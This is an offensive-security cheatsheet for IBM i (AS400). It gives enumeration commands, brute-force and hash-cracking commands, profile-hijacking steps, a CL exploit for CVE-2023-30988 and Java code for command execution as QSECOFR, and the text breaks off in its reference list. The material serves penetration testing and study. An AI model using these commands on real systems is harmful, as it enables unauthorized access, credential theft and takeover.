as-400.md (38106B)
1 --- 2 title: "AS400" 3 section: "Cheatsheets" 4 sectionSlug: "cheatsheets" 5 sourcePath: "docs/cheatsheets/as-400.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cheatsheets/as-400.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # AS400 12 13 AS400 (IBM i) is a midrange computer system developed by IBM, originally released in 1988. Now known as IBM i running on Power Systems, it is widely used for business applications due to its stability, security, and integrated database (DB2 for i) 14 15 ## Summary 16 17 * [Lab](#lab) 18 * [Enumeration](#enumeration) 19 * [Access and Audit](#access-and-audit) 20 * [Default Credentials](#default-credentials) 21 * [User Enumeration](#user-enumeration) 22 * [Telnet](#telnet) 23 * [POP3](#pop3) 24 * [FTP](#ftp) 25 * [Useful Commands](#useful-commands) 26 * [NMAP Scripts](#nmap-scripts) 27 * [User Class](#user-class) 28 * [Authority](#authority) 29 * [Special Authority](#special-authority) 30 * [Adopted Authority](#adopted-authority) 31 * [Password Cracking](#password-cracking) 32 * [Privilege Escalation](#privilege-escalation) 33 * [Initial Program Breakout](#initial-program-breakout) 34 * [Hijack Profile - SECOFR Security Class](#hijack-profile---secofr-security-class) 35 * [Hijack Profile - Authorities](#hijack-profile---authorities) 36 * [Hijack Profile - Profile Swapping](#hijack-profile---profile-swapping) 37 * [Unqualified Library Calls](#unqualified-library-calls) 38 * [From ALLOBJ to SECADM](#from-allobj-to-secadm) 39 * [Arbitrary Command Execution](#arbitrary-command-execution) 40 * [References](#references) 41 42 ## Lab 43 44 * [mainframed/DC30_Workshop](https://github.com/mainframed/DC30_Workshop) - DEFCON 30 Mainframe buffer overlow workshop container 45 * [mainframed/DVCA](https://github.com/mainframed/DVCA) - Damn Vulnerable CICS Application 46 47 ```ps1 48 docker run -d \ 49 --name=dvca \ 50 -e HUSER=docker \ 51 -e HPASS=docker \ 52 -p 21:21 \ 53 -p 23:23 \ 54 -p 3270:3270 \ 55 -p 3505:3505 \ 56 -p 3506:3506 \ 57 -p 8888:8888 \ 58 -v /opt/docker/dvca:/config \ 59 -v /opt/docker/dvca/printers:/printers \ 60 -v /opt/docker/dvca/punchcards:/punchcards \ 61 -v /opt/docker/dvca/logs:/logs \ 62 -v /opt/docker/dvca/dasd:/dasd \ 63 -v /opt/docker/dvca/certs:/certs \ 64 --restart unless-stopped \ 65 mainframed767/dvca:latest 66 ``` 67 68 ## Enumeration 69 70 By default, the FTP service send a banner with the following prefix: 71 72 ```ps1 73 220-QTCP at 74 ``` 75 76 Common ports in AS400 devices: 77 78 ```ps1 79 20, 21, 23, 25, 80, 110, 137, 138, 139, 389, 443, 446, 448, 449, 512, 910, 992, 2001, 2010, 3000, 5061, 5544, 5555, 5566, 5577, 8470, 8471, 8472, 8473, 8474, 8475, 8476, 9470, 9471, 9472, 9473, 9474, 9475, 9476 80 ``` 81 82 | Name | Description | Port | Port (SSL) | 83 | ------------- | -------------------------------------------------------------------------------------------------------- | --------------- | ---------- | 84 | FTP | FTP server is used to access the AS/400 file system | 20,21 | / | 85 | Telnet | Telnet server is used to access 5250 emulation | 23 | 992 | 86 | SMTP | SMTP server is used to provide mail transfer | 25 | / | 87 | HTTP | HTTP server is used to provide web page | 80 | 443 | 88 | POP3 | POP3 server is used to provide mail fetch | 110 | 910 | 89 | NetServer | NetServer allows access to AS/400 integrated file system from Windows PCs | 137,138,139,445 | / | 90 | LDAP | LDAP provides a network directory service | 389 | 636 | 91 | DDM | DDM server is used to access data via DRDA and for record level access. | 446 | 448 | 92 | As-svrmap | Port mapper returns the port number for the requested server. | 449 | / | 93 | As-rmtcmd | Remote command server is used to send commands from a PC to an AS/400 and for program calls. | 512 | / | 94 | As-admin-http | HTTP server administration. | 2001 | 2010 | 95 | As-sts | Service tools server | 3000 | / | 96 | As-mtgc | Management Central server is used to manage multiple AS/400s in a network. | 5555,5544 | 5566,5577 | 97 | As-central | Central server is used when a Client Access license is required and for downloading translation tables. | 8470 | 9470 | 98 | As-database | Database server is used for accessing the AS/400 database. | 8471 | 9471 | 99 | As-dtaq | Data Queue server allows access to the AS/400 data queues, used for passing data between applications. | 8472 | 9472 | 100 | As-file | File Server is used for accessing any part of the AS/400 file system. | 8473 | 9473 | 101 | As-netprt | Printer Server is used to access printers known to the AS/400. | 8474 | 9474 | 102 | As-rmtcmd | Remote command server is used to send commands from a PC to an AS/400 and for program calls. | 8475 | 9475 | 103 | As-signon | Sign-on server is used for every Client Access connection to authenticate users and to change passwords. | 8476 | 9476 | 104 105 ## Access and Audit 106 107 **Access**: 108 109 * [tn5250/tn5250](https://github.com/tn5250/tn5250) - A curses-based 5250 terminal client 110 * [x3270](https://x3270.bgp.nu/) - IBM 3270 terminal emulator 111 * [ayoul3/wc3270_hacked](https://github.com/ayoul3/wc3270_hacked) - A hacked version of wc3270 that removes field protection and displays hidden fields 112 * [Mocha TN3270](https://mochasoft.dk/tn3270.htm) - Mocha TN3270 provides TN3270 emulation for IBM Mainframe Access 113 * [Mocha TN5250](https://mochasoft.dk/tn5250.htm) - Mocha TN5250 provides TN5250 emulation for IBM Mainframe Access 114 * IBM i Access Client Solutions (5250 Console): `servername.com/WSG` or Telnet 115 * IBM Navigator for i (Web Interface): `http://systemName:2001` 116 117 Signed-off profiles can still be used—not for opening a 5250 session, but they should work with other protocols. 118 119 All the objects can be queried from the database DB2. 120 121 **Audit**: 122 123 * [hackthelegacy/hack400tool](https://github.com/hackthelegacy/hack400tool/tree/master/dist) - Security handling tools for IBM Power Systems 124 * [hack400auditor/hack400auditor.jar](https://github.com/hackthelegacy/hack400tool/blob/master/dist/hack400auditor/hack400auditor.jar) 125 * [hack400exploiter/hack400exploiter.jar](https://github.com/hackthelegacy/hack400tool/blob/master/dist/hack400exploiter/hack400exploiter.jar) 126 * [hack400scanner/hack400scanner.jar](https://github.com/hackthelegacy/hack400tool/blob/master/dist/hack400scanner/hack400scanner.jar) 127 * [ayoul3/cicspwn](https://github.com/ayoul3/cicspwn) - CICSpwn is a tool to pentest a CICS Transaction servers on z/OS. 128 * [ayoul3/cicsshot](https://github.com/ayoul3/cicsshot) - Tool to screenshot CICS transactions 129 * [sensepost/birp](https://github.com/sensepost/birp) - Big Iron Recon & Pwnage 130 131  132 133 ## Default Credentials 134 135 ```ps1 136 # Print users with default passwords (Username == Password case insensitive) 137 # Must have *ALLOBJ and *SECADM special authorities to use this command. 138 ANZDFTPWD 139 ``` 140 141 Other default profiles: 142 143 ```ps1 144 QAUTPROF QBRMS QCLUMGT QCLUSTER QCOLSRV 145 QDBSHR QDBSHRDO QDFTOWN QDIRSRV QDLFM 146 QDOC QDSNX QEJB QFNC QGATE 147 QLPAUTO QLPINSTALL QMQM QMQMADM QMSF 148 QNETSPLF QNFSANON QNOTES QNTP QPEX 149 QPGMR QPM400 QPRJOWN QRJE QRMTCAL 150 QSECOFR QSNADS QSPL QSPLJOB QSRV 151 QSRVBAS QSVCDRCTR QSYS QSYSOPR QTCP 152 QTFTP QTMHHTP1 QTMHHTTP QTMPLPD QTMTWSG 153 QTSTRQS QUMB QUSER QYPSJSVR QYPUOWN30 154 ``` 155 156 ## User Enumeration 157 158 ### Telnet 159 160 Authentication Error Messages in **Telnet** 161 162 * CPF1107 : Password not correct for user profile 163 * CPF1109 : Not authorized to subsystem. 164 * CPF1110 : Not authorized to work station. 165 * CPF1116 : Next not valid sign-on attempt varies off device. 166 * CPF1118 : No password associated with user XYZ. 167 * CPF1120 – User AABBA does not exist 168 * CPF1133 Value X Z S is not a valid name 169 * CPF1392 : Next not valid sign-on disables user profile. 170 * CPF1394 : User profile XYZ cannot sign on. 171 172 ### POP3 173 174 Authentication Error Messages in **POP3** 175 176 ```ps1 177 +OK POP3 server ready 178 USER bogus 179 +OK POP3 server ready 180 PASS xyz 181 -ERR Logon attempt invalid CPF2204 182 ``` 183 184 * CPF2204 : User profile not found 185 * CPF22E2 : Password not correct for user profile 186 * CPF22E3 : User profile is disabled 187 * CPF22E4 : Password for user profile has expired 188 * CPF22E5 : No password associated with user profile 189 190 ### FTP 191 192 Create a symbolic link to the QSYS library and list *.USRPRF 193 194 ```ps1 195 open as400.victim.com 196 as400user 197 password 198 quote site namefmt 1 199 quote site listfmt 1 200 mkdir /test12345 201 quote rcmd ADDLNK OBJ('/qsys.lib') 202 NEWLNK('/test12345/qsys') 203 dir /test12345/qsys/*.usrprf 204 ``` 205 206 ## Useful Commands 207 208 | Command | Description | 209 | ------------------------------------------------------- | -------------------------------------------------------------- | 210 | `DSPUSRPRF <user>` | Display user profile | 211 | `WRKUSRPRF <user>` | Display user, look for Group profile , and Supplemental groups | 212 | `WRKUSRPRF *ALL` | Display all users | 213 | `DSPPGM LIB/PROGRAM` | Display program infos | 214 | `WRKOBJ (*ALL QSYS *LIB)` | List libraries | 215 | `CHGUSRPRF USRPRF(<USERNAME>) PASSWORD(<NEW_PASSWORD>)` | Setup User Password | 216 | `QSH` | Start a QSHELL instance | 217 218 Check strings in PGM/SRVPGM 219 220 ```ps1 221 cat QLWIUTIL4.SRVPGM | iconv -f cp1141 -t UTF-8 | strings 222 ``` 223 224 ## NMAP Scripts 225 226 * [nse/tn3270-screen](https://nmap.org/nsedoc/scripts/tn3270-screen.html) - Connects to a tn3270 'server' and returns the screen. 227 228 ```ps1 229 nmap --script tn3270-info,tn3270_screen <host> 230 ``` 231 232 * [nse/tso-enum](https://nmap.org/nsedoc/scripts/tso-enum.html) - TSO User ID enumerator for IBM mainframes (z/OS). 233 234 ```ps1 235 nmap --script=tso-enum -p 23 <targets> 236 nmap -sV -p 9923 10.32.70.10 --script tso-enum --script-args userdb=tso_users.txt,tso-enum.commands="logon applid(tso)" 237 ``` 238 239 * [nse/tso-brute](https://nmap.org/nsedoc/scripts/tso-brute.html) - TSO account brute forcer. 240 241 ```ps1 242 nmap -p 2401 --script tso-brute <host> 243 ``` 244 245 * [nse/cics-user-enum](https://nmap.org/nsedoc/scripts/cics-user-enum.html) - CICS User ID enumeration script for the CESL/CESN Login screen. 246 247 ```ps1 248 nmap --script=cics-user-enum -p 23 <targets> 249 nmap --script=cics-user-enum --script-args userdb=users.txt,cics-user-enum.commands="exit;logon applid(cics42)" -p 23 <targets> 250 ``` 251 252 * [nse/cics-user-brute](https://nmap.org/nsedoc/scripts/cics-user-brute.html) - CICS User ID brute forcing script for the CESL login screen. 253 254 ```ps1 255 nmap --script=cics-user-brute -p 23 <targets> 256 nmap --script=cics-user-brute --script-args userdb=users.txt,cics-user-brute.commands="exit;logon applid(cics42)" -p 23 <targets> 257 ``` 258 259 * [nse/cics-info](https://nmap.org/nsedoc/scripts/cics-info.html) 260 261 ```ps1 262 nmap --script=cics-info -p 23 <targets> 263 nmap --script=cics-info --script-args cics-info.commands='logon applid(coolcics)',cics-info.user=test,cics-info.pass=test,cics-info.cemt='ZEMT',cics-info.trans=CICA -p 23 <targets> 264 ``` 265 266 * [nse/cics-enum](https://nmap.org/nsedoc/scripts/cics-enum.html) - CICS transaction ID enumerator for IBM mainframes. 267 268 ```ps1 269 nmap --script=cics-enum -p 23 <targets> 270 nmap --script=cics-enum --script-args=idlist=default_cics.txt,cics-enum.command="exit;logon applid(cics42)",cics-enum.path="/home/dade/screenshots/",cics-enum.noSSL=true -p 23 <targets> 271 ``` 272 273 * [nse/lu-enum](https://nmap.org/nsedoc/scripts/lu-enum.html) - Attempts to enumerate Logical Units (LU) of TN3270E servers. 274 275 ```ps1 276 nmap --script lu-enum --script-args lulist=lus.txt,lu-enum.path="/home/dade/screenshots/" -p 23 -sV <targets> 277 ``` 278 279 * [nse/vtam-enum](https://nmap.org/nsedoc/scripts/vtam-enum.html) - Brute force those VTAM application IDs 280 281 ```ps1 282 nmap --script vtam-enum --script-args idlist=defaults.txt,vtam-enum.command="exit;logon applid(logos)",vtam-enum.macros=true,vtam-enum.path="/home/dade/screenshots/" -p 23 -sV <targets> 283 ``` 284 285 ## User Class 286 287 A User Class (USRCLS) defines a predefined set of authorities and system privileges for a user profile. It determines the user's general role and access level within the system. However, a user class alone does not directly grant special authorities (SPCAUT); instead, it serves as a guideline for assigning them. 288 289 In this example, we create a high-privilege user by assigning them the `*SECOFR` (Security Officer) user class (USRCLS). By setting the special authority attribute (SPCAUT) to `*USRCLS`, the system automatically grants the user all special authorities associated with the `*SECOFR` class. 290 291 ```ps1 292 CRTUSRPRF USRPRF(MYUSER) PASSWORD(MYPASSWORD) USRCLS(*SECOFR) SPCAUT(*USRCLS) 293 ``` 294 295 | User Class | Special Authority from User Classes | 296 | ---------------------------------- | ---------------------------------------------------------------------------------------------------------------- | 297 | `*SECOFR` (Security Officer) | Full system control, including user management and security. All special authorities | 298 | `*SECADM` (Security Administrator) | Can manage users but not system-wide settings. `*SECADM` special authority | 299 | `*SYSOPR` (System Operator) | Can manage system operations but not security settings. `*SAVSYS` and `*JOBCTL` special authority | 300 | `*ALLOBJ` (All Object Authority) | Can access all objects but may lack security control. | 301 | `*PGMR` | Can create and modify programs but has limited access to system administration functions. No special authorities | 302 | `*USER` | Standard user with minimal privileges, typically for general system use. No special authorities | 303 304 ## Authority 305 306 In AS400 (IBM i), authority controls user access to system objects (libraries, files, programs, etc.). It ensures security by defining what users can do with specific objects. 307 308 * `*ALL`: Full access (read, write, delete, execute). 309 * `*CHANGE`: Modify but not delete. 310 * `*EXCLUDE`: No access. 311 * `*USE`: Read-only or execute. 312 * `*USERDEF`: Custom authority settings based on a user's specific needs. 313 314 Secure authority standard for users: 315 316 * `USRCLS` should be `*USER` 317 * `SPCAUT` should be `*NONE` 318 * `AUT` should always be `*EXCLUDE` 319 * `*USRPRF` should have authority to itself 320 * `*PUBLIC` should be `*EXCLUDE` 321 * No other authorities should exist. 322 323 ```ps1 324 Object . . . . . . . : XXXXXX Owner . . . . . . . : QSECOFR 325 Library . . . . . : QSYS Primary group . . . : *NONE 326 Object type . . . . : *USRPRF ASP device . . . . . : *SYSBAS 327 328 Object 329 User Group Authority 330 *PUBLIC *EXCLUDE 331 QSECOFR *ALL 332 XXXXXX USER DEF 333 ``` 334 335 Special authorities defaults (security level 30 or above) 336 337 | User Class | Special Authority | 338 | ---------- | ----------------- | 339 | *SECOFR | *ALL | 340 | *SECADM | *SECADM | 341 | *PGMR | *NONE | 342 | *SYSOPR | *JOBCTL,*SAVSYS | 343 | *USER | *NONE | 344 345 ## Special Authority 346 347 Special authority is used to specify the types of actions a user can perform on system resources. A user can be given one or more special authorities. 348 349 * `*ALLOBJ` special authority: All-object (`*ALLOBJ`) special authority allows the user to access any resource on the system whether private authority exists for the user. 350 * `*SECADM` special authority: Security administrator (`*SECADM`) special authority allows a user to create, change, and delete user profiles. 351 * `*JOBCTL` special authority: The Job control (`*JOBCTL`) special authority allows a user to change the priority of jobs and of printing, end a job before it has finished, or delete output before it has printed. `*JOBCTL` special authority can also give a user access to confidential spooled output, if output queues are specified `OPRCTL(*YES)`. 352 * `*SPLCTL` special authority: Spool control (`*SPLCTL`) special authority allows the user to perform all spool control functions, such as changing, deleting, displaying, holding and releasing spooled files. 353 * `*SAVSYS` special authority: Save system (`*SAVSYS`) special authority gives the user the authority to save, restore, and free storage for all objects on the system, regardless of whether the user has object existence authority to the objects. 354 * `*SERVICE` special authority: Service (`*SERVICE`) special authority allows the user to start system service tools using the STRSST command. This special authority allows the user to debug a program with only `*USE` authority to the program and perform the display and alter service functions. It also allows the user to perform trace functions. 355 * `*AUDIT` special authority: Audit (`*AUDIT`) special authority gives the user the ability to view and change auditing characteristics. 356 * `*IOSYSCFG` special authority: System configuration (`*IOSYSCFG`) special authority gives the user the ability to change how the system is configured. Users with this special authority can add or remove communications configuration information, work with TCP/IP servers, and configure the internet connection server (ICS). Most commands for configuring communications require `*IOSYSCFG` special authority. 357 358 ```ps1 359 # Print users with special authorities 360 PRTUSRPRF TYPE(*ALL) SELECT(*SPCAUT) SPCAUT(*ALL) 361 362 # Print rights on a library object 363 DSPOBJAUT OBJ(MYLIB) OBJTYPE(*LIB) 364 ``` 365 366 **QSECOFR** (short for Security Officer) is the highest-level user profile, similar to the "root" user in Unix/Linux or the "Administrator" account in Windows. It has full control over the system, including security settings, user management, and system configuration. 367 368 The `*ALLOBJ` (All Object Authority) special authority allows a user to access all objects on the system, regardless of their specific object-level permissions. A user with this authority can perform almost any action on the system, making it a powerful and sensitive privilege. 369 370 **QSECOFR** has `*ALLOBJ` by default, along with other special authorities, making it the most powerful user profile on IBM i. 371 372 ## Adopted Authority 373 374 Equivalent of setuid in Linux. 375 376 Adopted Authority allows a user to acquire authority to objects beyond what is granted by `*PUBLIC` and private authorities. As an example, suppose a user should normally be restricted from payroll files, but to perform his job, the user must be able to run a payroll report. Adopted authority allows the user to acquire enough authority to read the file for the purpose of the payroll report without granting the user any authority to the file outside of the program that runs the report. 377 378 Before granting adopted authority to PAYLIST, you must determine what authorities it already has. On an operating system command line, type the following: 379 380 ```ps1 381 DSPPGM PAYLIB/PAYLIST 382 ``` 383 384 Example of an adopted authority running as QAUTPROF 385 386 ```ps1 387 Owner: QAUTPROF 388 User profile: *OWNER 389 Use adopted authority: *YES 390 ``` 391 392 If User profile is `*OWNER`, the program runs combining the authorities of the Owner of the program with those of the User Profile running the program. 393 394 ## Password Cracking 395 396 **Requirements**: 397 398 * `*ALLOBJ` privileges: Full control over all objects 399 * `*SECADM` privileges: Profile management, low-level system access 400 401 Extract hashes with **QSYRUPWD**: 402 403 | Description | Format | Type | Example | 404 | --------------------------- | ------ | ---------- | ---------- | 405 | Receiver variable | Output | Char(*) | 2000B | 406 | Length of receiver variable | Input | Binary(4) | | 407 | Format | Input | Char(8) | "UPWD0100" | 408 | User profile name | Input | Char(10) | userName | 409 | Error code | I/O | Char(*) | | 410 411 The output format **UPWD0100** is documented below: 412 413 | Offset Dec | Offset Hex | Type | Field | 414 | ---------- | ---------- | --------- | ---------------------------- | 415 | 0 | 0 | BINARY(4) | Bytes returned | 416 | 4 | 4 | BINARY(4) | Bytes available | 417 | 8 | 8 | CHAR(10) | User profile name | 418 | 18 | 12 | CHAR(*) | Encrypted user password data | 419 420 **Encrypted password data** hex string 421 422 | Offset (Dec) | Length (Chars) | Field | QPWDLVL | 423 | ------------ | -------------- | -------------------------------------------------- | -------------- | 424 | 0 | 16 | DES 56-bit encrypted password substitute (RFC2877) | 0, 1, 2* | 425 | 16 | 16 | DES 56-bit encrypted password substitute (RFC2877) | 0, 1, 2* | 426 | 32 | 32 | LM hash | 0, 1, 2* | 427 | 64 | 4 | No data | | 428 | 68 | 40 | HMAC-SHA1 encrypted password token (RFC4777)? | 0**, 1**, 2, 3 | 429 | 108 | 40 | HMAC-SHA1 encrypted password token (RFC4777)? | 0**, 1**, 2, 3 | 430 | 148 | 6 | No data | | 431 | 154 | 384 | Unknown (hash?) data | 0, 1, 2, 3 | 432 433 If the machine is still using the `QPWDLVL < 3`, then an attacker can still recover DES and LM hashes. 434 435 | Hash | John | 436 | -------------- | -------------------------------------- | 437 | LM | `john --format=LM {filename}` | 438 | IBM DES | `john --format=as400-des {filename}` | 439 | SHA1 Uppercase | `john --format=as400-ssha1 {filename}` | 440 441 ```ps1 442 # Hashcat command for LM hashes 443 .\hashcat.exe -m 3000 -a 3 --increment --username -1 ?u?d?s .\hashes.txt ?1?1?1?1?1?1?1 444 ``` 445 446 * [willstruggle/ibmiscanner2john.py](https://github.com/willstruggle/john/blob/master/ibmiscanner2john.py) - Convert files in format userid:hash (e.g files produced by older versions of the ibmiscanner tool) to the as400-sha format that can be processed by JtR 447 * [hackthelegacy/pwd400gen.py](https://web.archive.org/web/20170224172524/http://www.hackthelegacy.org/attachments/pwd400gen.py) - Password hash generator for IBM Power Systems 448 449 ## Privilege Escalation 450 451 ### Initial Program Breakout 452 453 * Click "`Attn`" button. The attention interrupt key (ATTN) allows the authenticated user to interrupt/end a process and display a menu with additional functions. 454 * Press `F9` to run commands 455 456 ```ps1 457 # Spawn a PASE shell 458 CALL QP2TERM 459 460 # Execute a script 461 CALL QP2SHELL PARM('/QOpenSys/usr/bin/sh' + '/tmp/scr') 462 ``` 463 464 ### Hijack Profile - SECOFR Security Class 465 466 User profiles assigned with the `*SECOFR` (Security Officer) security class are automatically granted `*ALLOBJ` (All Object) authority, giving them unrestricted access to all system objects. Refer to [User Class](#user-class) 467 468 Display a user profile in several different formats with `DSPUSRPRF`. 469 470 ```ps1 471 DSPUSRPRF <username> 472 ``` 473 474 The user submitting this must have `*ALLOBJ` and `*JOBCTL` authority. 475 476 * Submitting a Job as `<USERNAME>` 477 478 ```ps1 479 SBMJOB CMD(DSPJOB) JOB(TESTJOB) USER(<USERNAME>) 480 ``` 481 482 * Then check the job log: 483 484 ```ps1 485 WRKJOB TESTJOB 486 ``` 487 488 ### Hijack Profile - Authorities 489 490 * Print Public Authority: any user profiles have authority that is not set to the default of `*PUBLIC AUT(*EXCLUDE)` 491 492 ```ps1 493 PRTPUBAUT OBJTYPE(*USRPRF) 494 ``` 495 496 * Print Private Authority 497 498 ```ps1 499 PRTPVTAUT OBJTYPE(*USRPRF) 500 ``` 501 502 Look for `*USE` rights or better(e.g. `*CHANGE`, `*ALL`) to someone else's User Profile. 503 504 This `SBMJOB` command will submit a batch job to run under the `HIJACKED_USER` user profile, and will print out the records in the `FILE_OF_HIJACKED_USER` file where the `HIJACKED_USER` User Profile have access. 505 506 > The Submit Job (SBMJOB) command allows a job that is running to submit another job to a job queue to be run later as a batch job. Only one element of request data can be placed on the new job's message queue. - [IBM/SBMJOB](https://www.ibm.com/docs/en/i/7.4?topic=ssw_ibm_i_74/cl/sbmjob.html) 507 508 ```ps1 509 SBMJOB CMD(CPYF FROMFILE(FILE_OF_HIJACKED_USER) TOFILE(*PRINT)) USER(HIJACKED_USER) 510 ``` 511 512 ### Hijack Profile - Profile Swapping 513 514 Used to change the thread user profile running the application in order to obtain elevated authority. 515 516 * Check the list of profiles 517 * Grab a profile handle: [`QSYGETPH`](https://www.ibm.com/docs/api/v1/content/ssw_ibm_i_75/apis/QSYGETPH.htm) 518 * Set profile based on the token generated by QSYGETPH: [`QWTSETP`](https://www.ibm.com/docs/api/v1/content/ssw_ibm_i_75/apis/QWTSETP.htm) 519 * Repeat until you have obtained the highest access level 520 * Release profile handle: [`QSYRLSPH`](https://www.ibm.com/docs/api/v1/content/ssw_ibm_i_75/apis/QSYRLSPH.htm) 521 522 ```c 523 /* Call QSYGETPH to get a profile handle for a user. */ 524 /* NOTE: Change USERPROFILE to the user who you want to swap to. */ 525 CALL QSYS/QSYGETPH ('USERPROFILE' '*NOPWDCHK' &HNDL) 526 /* Call QWTSETP to swap to the profile. */ 527 CALL QSYS/QWTSETP &HNDL 528 ``` 529 530 | Value | Description | 531 | ----------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | 532 | `*NOPWD` | The user requesting the profile handle must have `*USE` authority to the user profile. A profile handle does not get created for a disabled user profile. A profile handle does not get created for a user profile with an expired password. | 533 | `*NOPWDCHK` | The user requesting the profile handle must have `*USE` authority to the user profile. If the profile is disabled, the user requesting the profile handle must have `*ALLOBJ` and `*SECADM` special authorities to get a handle. If the password is expired, the user requesting the profile handle must have `*ALLOBJ` and `*SECADM` special authorities to get a handle. | 534 | `*NOPWDSTS` | The user requesting the profile handle must have *USE authority to the user profile. A profile handle does not get created for a disabled user profile. If the password is expired, the user requesting the profile handle must have `*ALLOBJ` and `*SECADM` special authorities to get a handle. | 535 536 You cannot obtain a profile handle for the following system-supplied user profiles: 537 538 ```ps1 539 QAUTPROF QDLFM QMSF QSNADS QTSTRQS 540 QCLUMGT QDOC QNETSPLF QSPL 541 QCOLSRV QDSNX QNFSANON QSPLJOB 542 QDBSHR QFNC QNTP QSRVAGT 543 QDBSHRDO QGATE QPEX QSYS 544 QDFTOWN QLPAUTO QPM400 QTCP 545 QDIRSRV QLPINSTALL QRJE QTFTP 546 ``` 547 548 **JDBC**: 549 550 ```SQL 551 CREATE OR REPLACE PROCEDURE J_QSYGETPH (IN USERNAME VARBINARY(10), IN PASSWORD VARBINARY(10), OUT HANDLE VARBINARY(12)) EXTERNAL NAME QSYS.QSYGETPH LANGUAGE C++ GENERAL 552 CALL J_QSYGETPH('USERPROFILE', "*NOPWD", PROFILE_HANDLE) 553 554 CREATE OR REPLACE PROCEDURE J_QWTSETP (IN HANDLE VARBINARY(12)) EXTERNAL NAME QSYS.QWTSETP LANGUAGE C++ GENERAL 555 CALL J_QWTSETP(PROFILE_HANDLE) 556 ``` 557 558 ### Unqualified Library Calls 559 560 > "applications that use library lists rather than qualified library names have a potential security exposure. A user who is authorized to the commands to work with library lists can potentially run a dierent version of a program." - [ibm.com/security-library-library-lists](https://www.ibm.com/docs/en/i/7.3?topic=security-library-library-lists) 561 562 | Code | Check | 563 | ------------------ | ---------- | 564 | CALL LIBFOO/OBJBAR | SECURE | 565 | CALL OBJBAR | VULNERABLE | 566 567 **Example**: 568 569 CVE-2023-30988: LIBL abuse, PATH abuse on IBM i - Lirbry List Exploitation 570 571 ```SQL 572 DSPUSRPRF <user> -- Display user profile 573 CRTLIB <user> -- Create library 574 STRSEU <user>/QCLSRC QFQSES -- Show sources of QFQSES, 575 -- require to compile it 576 PGM 577 CALL QSYS/QCMD 578 ENDPGM 579 580 ADDLIBLE <user> -- Add user to the libraries 581 DSPAUTUSR -- Display user profile 582 CALL QFAX/QFFSTRFCPP PARM(1 2) -- Call the vulnerable program 583 DSPAUTUSR -- Display user profile, QAUTPROF and QFAXMSF should be available 584 CALL <user>/ESCALATE QFAXMSF -- Profile swapping 585 -- require to compile the ESCALATE program 586 PGM PARM(&USER) 587 DCL VAR(&USER) TYPE(*CHAR) LEN(10) 588 DCL VAR(&HANDLE) TYPE(*CHAR) LEN(12) 589 DCL VAR(&ERROR) TYPE(*CHAR) LEN(4) 590 CHGVAR VAR(%BIN(&ERROR)) VALUE(0) 591 CALL PGM(QSYGETPH) PARM(&USER *NOPWD &HANDLE &ERROR) 592 CHGVAR VAR(%BIN(&ERROR)) VALUE(0) 593 CALL PGM(QWTSETP) PARM(&HANDLE &ERROR) 594 ENDPGM 595 596 DSPAUTUSR -- Should display all profiles 597 -- QFAXMSF has *ALLOBJ 598 ``` 599 600 ### From ALLOBJ to SECADM 601 602 * Query users informations: 603 604 ```c 605 DSPUSRPRF USRPRF(*ALL) TYPE(*BASIC) OUTPUT(*OUTFILE) OUTFILE(PENTEST/USERDB) 606 ``` 607 608 * Create a CL script to escalate privilege and compile it with `STRPDM` (output is `PRIVESC`) 609 * Call the generated PGM (program object): `CALL PENTEST/PRIVESC USERWITHSECADM` 610 611 ### Arbitrary Command Execution 612 613 * QSECOFR user - Compile as `.jar` file and run inside QSH: `java -jar /home/user/exploit.jar` 614 615 ```java 616 // Triggering with JTOpen 617 sPGMCall.setProgram("/QSYS.LIB/QLWIUTIL4.SRVPGM"); 618 String str = "`id>/tmp/xy.txt`"; // command execution with QSECOFR 619 ProgramParameter[] programParameterArr = { 620 new ProgramParameter(2, new AS400Text(str.length() + 1, system).toBytes(str + (char) 0)), 621 new ProgramParameter(2, new byte[16384], 16384) // hatmanager.jar 622 }; 623 sPGMCall.setParameterList(programParameterArr); 624 sPGMCall.setProcedureName("QlwiRelayCall"); 625 ``` 626 627 * QSECOFR user - CVE-2023-40685 628 * QDIRSRV user - CVE-2023-40378 629 * QYPSJSVR user - CVE-2023-40686 630 * QBRMS user - CVE-2023-40377 631 632 ## References 633 634 * [Abusing Adopted Authority on IBM i - Zoltán Pánczél - January 20, 2023](https://blog.silentsignal.eu/2023/01/20/abusing-adopted-authority-on-ibm-i/) 635 * [Adopted Authority - IBM Support - October 3, 2024](https://www.ibm.com/support/pages/adopted-authority) 636 * [An IBM i Hacking Tale - Pablo Zurro - April 6, 2023](https://www.fortra.com/blog/ibm-i-hacking-tale) 637 * [Another Tale of IBM i (AS/400) Hacking - Zoltán Pánczél - September 28, 2022](https://blog.silentsignal.eu/2022/09/28/another-tale-of-ibm-i-as-400-hacking/) 638 * [AS/400 for pentesters - Black Hat Europe 2006 - Shalom Carmel](https://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Carmel/bh-eu-06-Carmel.pdf) 639 * [Awesome-Mainframe-Hacking - samanL33T - July 10, 2019](https://github.com/samanL33T/Awesome-Mainframe-Hacking) 640 * [Below MI - IBM i for Hackers - Silent Signal - August 22, 2024](https://silentsignal.github.io/BelowMI/) 641 * [Common Misconcepts on IBM i User Class - *SECOFR - Dan Riehl - September 12, 2013](https://www.securemyi.com/nl/articles/userclass.html) 642 * [FrenchIBMi - Christian Massé - March 15, 2017](https://github.com/FrenchIBMi/Clubs/) 643 * [Geeking Out On IBM i - Part 1 - Anonymous - August 31, 2021](https://web.archive.org/web/20210831231128/https://blog.grimm-co.com/2021/07/geeking-out-on-ibm-i-part-1.html) 644 * [Guru: IBM i *USRPRF Security - Bruce Bading - May 23, 2022](https://www.itjungle.com/2022/05/23/guru-ibm-i-usrprf-security/) 645 * [Hack the Legacy: IBM I aka AS400 Revealed - Bart Kulach - December 25, 2015](https://youtu.be/JsqUZ3xGdLc) 646 * [Hack the legacy! IBM i (aka AS/400) revealed - Bart Kulach - May 11, 2021](https://media.defcon.org/DEF%20CON%2023/DEF%20CON%2023%20presentations/DEF%20CON%2023%20-%20Bart-Kulach-Hack-the-Legacy-IBMi-revealed.pdf) 647 * [Hacking IBM AS/400 in 2024: QShell and Remote Code Execution - Mateusz Lewczak - October 04, 2024](https://www.securitum.com/hacking_ibm_as400_in_2024.html) 648 * [How to get & crack AS/400 hashes? - Fossies - November 7, 2017](https://fossies.org/linux/john/doc/README.IBM_AS400) 649 * [IBM 